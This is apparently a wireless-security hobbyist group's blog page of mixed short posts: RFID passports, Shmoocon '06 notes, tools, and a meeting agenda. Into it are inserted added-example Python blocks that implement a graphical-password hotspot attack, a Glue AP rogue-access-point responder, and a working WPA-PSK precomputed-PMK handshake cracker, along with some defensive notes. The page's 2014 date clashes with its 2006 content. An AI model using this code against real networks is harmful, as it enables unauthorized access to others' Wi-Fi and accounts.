October 25th, 2014

RFID, tinfoil, “luciferian beehivers” and you

I’m not sure why I (or The Register) didn’t hear about this earlier, but apparently the proposed Dutch biometric passport has already been cracked. It looks like this was announced here some time ago. Electronic (being used here as a euphemism for RFID, now that it’s a bad word) passports are going to be issued during a pilot program in the US starting this month, but full compliance isn’t mandatory until this October.

This seems awfully fast considering that the Department of State says that they “will not issue passports incorporating integrated circuits until privacy-related concerns have been addressed,” and the initial feedback they received on the proposal was apparently 98.5% negative. This feedback, by the way, has been posted in whole on their website. When I say “in whole”, I mean all of it, including the name, email address and sometimes physical address and phone number, and anything else in the feedback (both email and snail mail). So, way to go, thanks for addressing our privacy concerns by posting the personal information of everyone that had feedback on the subject.

Just for grins, I whipped something up to grab all of the submitted comments, and did find this particular gem (I promise I did not make this up, it’s on the site!):

No mark of the beast for me you Luciferian beehivers.
You can take all those RFID chips wrapped like a burrito in the HR 4(6+6+6)
national id bill and stick it up yor own arse!

That left me to wonder what a “Luciferian beehiver” was, though; I’m not a big fan of either Satan or bees, much less a ghastly union of the two. Burritos are good, though. This comment was left by someone claiming to be simultaneously from both Texas and Heaven, though I’m pretty sure the two are nowhere near each other. I also found 9 other comments that referenced the “mark of the beast”, 17 that speak of “evil”, and 4 “Anti-Christs”.

Anyway, beehives aside, here is a link to the slides of the original researchers (Bart Jacobs & Ronny Wichers Schreur) who exposed the Dutch passport crack, and here are a couple of slides on the demo that he gave. The good thing is that it takes two hours with a computer (nobody ever waits two hours in an international airport, right?), and that there is still time for improvements (hopefully fixes) before they go primetime.

Graphical Passwords

The Graphical Passwords Project is an interesting alternative to the “typed” passwords we are all used to. “The idea of graphical passwords is to let the user click (with a mouse or a stylus) on a few chosen regions in an image that appears on the screen.” So if you click on the right regions, you’re in! I have to agree that clicking on Pamela Anderson’s photo for the password is a lot more exciting than typing long strings of ASCII. However, graphical passwords are still vulnerable to shoulder-surfing, brute-force, and dictionary attacks (well, not exactly dictionary, but we all know that selecting images of nipples for passwords will soon be in the top 10 commonly used graphical passwords). This paper offers a few solutions to this problem, like the use of randomly generated images or numbers and the use of image selection techniques not easily registered by malicious code (like dragging icons on the screen). If you would like to mess around with graphical passwords, there is a .NET Graphical Password Simulation application to experiment with and learn about this password scheme.
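As an added example (this is not code from the Graphical Passwords Project or the .NET simulator linked above), here is a small Python model of a click-region password: each click is snapped to a grid cell so that a little mouse jitter is tolerated, the ordered cell sequence is salted and hashed, and the search space is computed so the brute-force and “popular region” dictionary points above can be seen in numbers. The image size, cell size, click coordinates and hotspot list are assumptions chosen for the illustration.

```python
import hashlib
import hmac
import itertools
import math
import os

# Assumed parameters for the illustration (not from the Graphical Passwords Project).
IMAGE_W, IMAGE_H = 800, 600   # size of the image the user clicks on, in pixels
CELL = 20                     # tolerance: clicks in the same 20x20 cell count as the same click
GRID_W, GRID_H = IMAGE_W // CELL, IMAGE_H // CELL   # 40 x 30 = 1200 distinct cells
ITERATIONS = 100_000          # PBKDF2 work factor; makes every brute-force guess expensive


def to_cells(clicks):
    """Snap a sequence of (x, y) clicks to grid-cell indices (row-major order)."""
    cells = []
    for x, y in clicks:
        if not (0 <= x < IMAGE_W and 0 <= y < IMAGE_H):
            raise ValueError(f"click {(x, y)} lies outside the image")
        cells.append((y // CELL) * GRID_W + (x // CELL))
    return cells


def _digest(cells, salt):
    # Two-byte big-endian cell indices; the order of the clicks is part of the secret.
    material = b"".join(c.to_bytes(2, "big") for c in cells)
    return hashlib.pbkdf2_hmac("sha256", material, salt, ITERATIONS)


def enroll(clicks, salt=None):
    """Register a click password. Returns (salt, digest); store those, never the clicks."""
    salt = os.urandom(16) if salt is None else salt
    return salt, _digest(to_cells(clicks), salt)


def verify(clicks, salt, digest):
    """Accept a login attempt if its clicks fall in the enrolled cells, in the enrolled order."""
    try:
        cells = to_cells(clicks)
    except ValueError:
        return False
    return hmac.compare_digest(_digest(cells, salt), digest)


def search_space_bits(n_clicks):
    """Upper bound on entropy if every cell were equally likely (real users cluster on hotspots)."""
    return n_clicks * math.log2(GRID_W * GRID_H)


def hotspot_attack(salt, digest, hotspots, n_clicks):
    """Dictionary attack: try every ordered combination of a few 'popular' regions.

    `hotspots` is an assumed list of (x, y) positions an attacker believes users favour
    (faces, logos, ...). Returns the recovered click sequence, or None if not in the list.
    """
    for guess in itertools.product(hotspots, repeat=n_clicks):
        if verify(list(guess), salt, digest):
            return list(guess)
    return None
```

Two things worth noticing when running it: three clicks on a 40x30 grid give just under 31 bits, which is less than a random 6-character alphanumeric password, and a handful of hotspots cuts that to a few dozen guesses. Snapping to a fixed grid also means a legitimate click that lands one pixel across a cell boundary is rejected, which is the usability problem the randomized-image schemes in the paper try to address.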

nice wi-fi card

This looks like a nice 400mW miniPCI wi-fi card based on a 6th generation Atheros chipset. I particularly liked the warnings on the site: “This card is only for OEM, ODM and DIY system designs. This card is not suitable for laptop use.” Especially amusing when combined with the link later on the same page for “Visual how to install in a laptop”. Thanks to mother for the link.

I’ll take two.

HITB video

Here are some official .torrents of the videos from the Hack in the Box conference held in Kuala Lumpur. They even had one just for Jason on hacking Windows CE. ;)

Seed away people, I’m only getting about 12k right now, =)


The new-ish online computer security journal Uninformed now has volume three out. It has some interesting and in-depth material on topics like reverse engineering, fuzzing and the evolution of rootkit techniques (from both sides).

metasploit tutorial

Here’s a link to a tutorial on Metasploit. The subject material is aging a little, though, as Metasploit 3.0 is now in its second alpha and the article details version 2.3, which comes with Whax. Whax feels like it’s getting a bit old now too, since it was announced some time ago that Auditor and Whax are merging into BackTrack (but I haven’t seen anything out of it yet). Maybe if they wait long enough I can try to get wicrawl on it, =).

Someone let me know if you know of a tutorial like this for 3.0.

Wardriving with nintendo DS

Well, it looks like the Nintendo DS is finally starting to catch up to the PSP’s wi-fi/wardriving capabilities. Now I guess it’s time to port wicrawl to the PSP, =). We’ll have to see how useful the Python interpreter is, and how obfuscated the wireless interfaces are.

Thanks engadget

CodeCon ’06

CodeCon is coming up soon (Feb 10-12th) in San Francisco. They just announced the speaker list, and the early registration will be ending soon (Feb 1). It looks like there will be a few interesting talks.

Shmoocon ’06

Just checking in after meeting up at Shmoocon this year. The conference was good, especially considering that it’s only a second-year con. Attendance was sold out at 800 people, and the additional tickets on eBay were getting pretty expensive.

Highlights include:

Chilling with MRL people

We couldn’t seem to get all the slackers in the same room, but I was able to meet some people that were previously “virtual only”. Thanks to Focus for putting me up at his place, and showing me around. =)

Kaminsky is always a lark

Most of this talk was “the same-old”, but he also spoke a bit about network visualization with his new tool “xovi”.

Raw Fake AP, and Raw Glue AP and ??

I missed this talk by the guys at France Telecom, but heard about some new tools that were released. Raw Fake AP is a newer version of Fake AP that eliminates the obvious fingerprinting, so it’s harder to find the “real” AP in the noise. Glue AP sounds pretty cool too. It listens for the broadcast SSID request sent out when certain client cards start searching for a network. Glue AP then emulates whatever the card is looking for, and in some cases, the client will auto-join that network.
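To make the Glue AP behaviour concrete, here is an added Python model of the exchange (my own illustration, not the France Telecom tool or any of its code): a client sends a directed 802.11 probe request naming the SSID it remembers, the fake AP reads that SSID back out of the frame and answers with a probe response that claims exactly that name. The MAC addresses, the advertised capability bits and the “several SSIDs from one BSSID” detection threshold are assumptions; the frame layout (24-byte management header, then tagged id/length/value elements, little-endian fixed fields) is standard 802.11.

```python
import struct

PROBE_REQUEST = 0x40    # frame-control byte 0: type = management (0), subtype = 4
PROBE_RESPONSE = 0x50   # subtype = 5
BROADCAST = b"\xff" * 6
SSID_ELEMENT = 0
RATES_ELEMENT = 1


def mac(s):
    return bytes.fromhex(s.replace(":", ""))


def build_probe_request(client, ssid):
    """Constructed client probe request; an empty SSID is the wildcard (broadcast) probe."""
    # addr1 = destination, addr2 = transmitter (the client), addr3 = BSSID (broadcast for a probe)
    header = struct.pack("<BBH6s6s6sH", PROBE_REQUEST, 0, 0, BROADCAST, client, BROADCAST, 0)
    body = bytes([SSID_ELEMENT, len(ssid)]) + ssid + bytes([RATES_ELEMENT, 1, 0x82])
    return header + body


def parse_elements(body):
    """Walk the tagged parameters (id, length, value) that follow the fixed fields."""
    elements = {}
    i = 0
    while i + 2 <= len(body):
        eid, length = body[i], body[i + 1]
        value = body[i + 2:i + 2 + length]
        if len(value) != length:
            break          # truncated element: stop rather than read past the frame
        elements[eid] = value
        i += 2 + length
    return elements


def requested_ssid(frame):
    """SSID a probe request asks for: b'' for a wildcard probe, None if this is not a probe request."""
    if len(frame) < 24 or (frame[0] & 0xFC) != PROBE_REQUEST:   # mask off the protocol-version bits
        return None
    return parse_elements(frame[24:]).get(SSID_ELEMENT)


def glue_response(ap_mac, frame):
    """Glue AP logic: answer any directed probe with a probe response claiming that very SSID.

    Wildcard probes carry no name to impersonate, so they get no answer here. The response
    advertises an open network (capability ESS=1, privacy=0); a client whose saved profile
    expects encryption will not necessarily join, which is the 'in some cases' above.
    """
    ssid = requested_ssid(frame)
    if not ssid:
        return None
    client = frame[10:16]                                  # addr2 of the request = the probing client
    header = struct.pack("<BBH6s6s6sH", PROBE_RESPONSE, 0, 0, client, ap_mac, ap_mac, 0)
    fixed = struct.pack("<QHH", 0, 100, 0x0001)            # timestamp, beacon interval (TU), capability
    body = fixed + bytes([SSID_ELEMENT, len(ssid)]) + ssid + bytes([RATES_ELEMENT, 1, 0x82])
    return header + body


def response_ssid(frame):
    """Pull the SSID back out of a probe response (12 bytes of fixed fields after the header)."""
    if len(frame) < 36 or (frame[0] & 0xFC) != PROBE_RESPONSE:
        return None
    return parse_elements(frame[36:]).get(SSID_ELEMENT)


def bssids_answering_many_ssids(responses, threshold=3):
    """Defender's check: one BSSID answering probes for several different SSIDs behaves like a Glue AP."""
    seen = {}
    for f in responses:
        ssid = response_ssid(f)
        if ssid is not None:
            seen.setdefault(f[16:22], set()).add(ssid)   # addr3 of a probe response = BSSID
    return {bssid for bssid, names in seen.items() if len(names) >= threshold}
```

The last function is the cheap monitor-mode detection this gives you: a real access point answers for its own SSIDs only, so a single BSSID replying to probes for “CorpNet”, “Home” and an airport hotspot within a few seconds is worth flagging. On the client side, the fix is the one that eventually reached most operating systems: stop sending directed probes for remembered networks and only join a remembered profile when its security settings match.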

“Mystery tool” — I still want to know what this one was, =). I’ve emailed them to try to get their slides; it doesn’t look like they’re posted yet on the shmoocon site.

H1kari and “cardbus bus-mastering: owning the laptop”:

This was interesting and informational, though unfortunately the demo part was eighty-six’d at the last minute. Instead David [someone?] spoke about weaknesses in USB, and the bottom line was that you could write directly into memory and own a system simply by plugging in a USB device. I’m still interested in H1kari’s company’s FPGA “on a stick” though, hopefully they’re not too expensive when they come out.

RenderMan (and others) and pre-hashed WPA passwords

‘genpmk’ (or maybe jdumas??) is supposedly a new tool for doing this kind of thing. Church of wifi has more details.
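Since the page only names the tool, here is an added Python illustration of what “pre-hashed WPA passwords” means (my own code, not genpmk or anything from Church of Wifi). The expensive step in WPA-PSK is turning a passphrase into the 256-bit PMK with 4096 rounds of PBKDF2-HMAC-SHA1, salted with the SSID. A pre-hashing tool pays that cost once per word for one SSID and stores the PMKs; checking a captured 4-way handshake against the table then needs only a few cheap HMACs per entry. The block also shows why such tables are only useful against the SSID they were built for. The handshake it cracks is constructed inside the block (random MACs and nonces, a dummy EAPOL body); the first `wpa_pmk` value is checked against the IEEE 802.11i published test vector.

```python
import hashlib
import hmac
import os


def wpa_pmk(passphrase, ssid):
    """WPA/WPA2-PSK master key: PBKDF2-HMAC-SHA1, 4096 rounds, 32 bytes, SSID as the salt."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def build_pmk_table(ssid, wordlist):
    """The genpmk idea: do the PBKDF2 work once per word, for ONE SSID, and keep PMK -> passphrase."""
    return {wpa_pmk(w, ssid): w for w in wordlist if 8 <= len(w) <= 63}   # valid passphrase lengths


def prf(key, label, data, nbytes):
    """802.11i PRF-n: HMAC-SHA1 blocks over label || 0x00 || data || counter, concatenated."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def kck_from_pmk(pmk, aa, spa, anonce, snonce):
    """First 16 bytes of the PTK (the KCK), which authenticates the 4-way handshake messages."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)[:16]


def eapol_mic(kck, eapol_frame_mic_zeroed):
    """WPA2 (key descriptor version 2) MIC: HMAC-SHA1 truncated to 16 bytes. WPA/TKIP uses HMAC-MD5."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(table, aa, spa, anonce, snonce, eapol_zeroed, mic):
    """Per-handshake work is only PRF + HMAC per candidate; the PBKDF2 cost already lives in the table."""
    for pmk, passphrase in table.items():
        kck = kck_from_pmk(pmk, aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol_zeroed), mic):
            return passphrase
    return None


def make_sample_handshake(passphrase, ssid):
    """Constructed stand-in for a sniffed handshake: random MACs and nonces, an assumed EAPOL body."""
    aa, spa = b"\x02" + os.urandom(5), b"\x02" + os.urandom(5)
    anonce, snonce = os.urandom(32), os.urandom(32)
    eapol_zeroed = b"\x01\x03\x00\x75\x02\x01\x0a" + b"\x00" * 110   # message 2 with its MIC field zeroed
    mic = eapol_mic(kck_from_pmk(wpa_pmk(passphrase, ssid), aa, spa, anonce, snonce), eapol_zeroed)
    return aa, spa, anonce, snonce, eapol_zeroed, mic
```

The SSID-as-salt detail is the whole story behind these tables: they pay off against networks that keep a default or common name (“linksys”, “default”), and they buy nothing against a network with a unique SSID, where every candidate still costs 4096 rounds. Changing the SSID is therefore a real, if modest, defence on top of a long random passphrase.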

Oh, and by the way, all you Windows weenies now have Kismet for Windows.

Getting kicked out of the “mafia room” at the shmoocon party by famous Persian pop singers

Ok, we weren’t kicked out so much as edged out, but it took a little investigation to determine who the VIPs were. Their entourage was pretty intimidating too. The whole thing was a little surreal. I definitely had a little bit of “chest hair and over-sized sunglasses envy”.

An internet enabled arcade style crane

Somehow connecting random objects and making them either “internet enabled”, or “USB-powered” is always cool.

The .torrents of the talks and slides are supposed to be posted soon. Someone post a comment if they see this before I do and I’ll update the post.

January Meeting Agenda

Here’s the agenda for the January meeting. If you’re interested in attending (this Friday at 7pm), let us know:

Phase 0x0: Bootstrapping
- Greetings and welcome
- MRL updates and status
- Starting the new year out right
  - Member lists
  - New initiatives
  - Participation
Phase 0x1: Initialization
- ZigBee presentation (Jason Spence)
- ZigBee/RFID/librf brainstorming
- wicrawl
  - Status
  - Design, brainstorming, etc.
  - Demo ??
- Project hacking!
Phase 0x2: Local exploits
- Food
- WiFi Theremin demo ??!!
- Off-topic tools, toys and other shiny things -- if anyone has anything interesting to show off or play with, please bring it
- Whatever till whenever -- this is the more social part of the event. People are invited to stay and hack and have a couple of drinks till whenever this phase is no longer self-sustaining, =)
